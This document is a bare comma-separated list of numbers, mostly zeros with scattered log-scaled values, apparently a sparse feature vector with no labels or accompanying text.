0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.4965075614664802, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 4.007333185232471, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 6.4641735942733005, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.6390573296152584, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.5649493574615367, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.258096538021482, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.70805020110221, 0.0, 4.110873864173311, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.07753744390572, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.465908118654584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 